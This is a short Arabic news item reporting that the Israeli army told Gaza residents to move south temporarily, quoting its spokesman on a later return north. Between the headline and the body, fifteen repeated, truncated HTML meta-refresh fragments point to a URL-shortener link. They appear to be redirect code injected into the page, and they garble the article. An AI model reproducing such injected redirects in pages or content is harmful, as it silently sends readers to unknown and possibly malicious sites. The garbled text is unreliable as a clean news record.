جيش الاحتلال الإسرائيلى يطالب سكان قطاع غزة بالتوجه جنوبا بشكل مؤقت

equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
equiv=”refresh” content=”0; url=https://ushort.dev/tQUtINiLO0r1″ />
دعا جيش الاحتلال الإسرائيلي، سكان غزة بالتوجه نحو جنوب القطاع، وقال: “هذا إنذار عاجل للتوجه جنوبًا بشكل مؤقت حفاظًا على سلامتكم”.
وقال دانييل هاغاري، المتحدث باسم جيش الاحتلال: العودة إلى شمال القطاع ممكنة، بمجرد انتهاء الاشتباكات المسلحة الشديدة، زاعما أن الفصائل الفلسطينية تعرض المدنيين للخطر، ووضعت المنشآت العسكرية والقوات في المناطق المدنية.




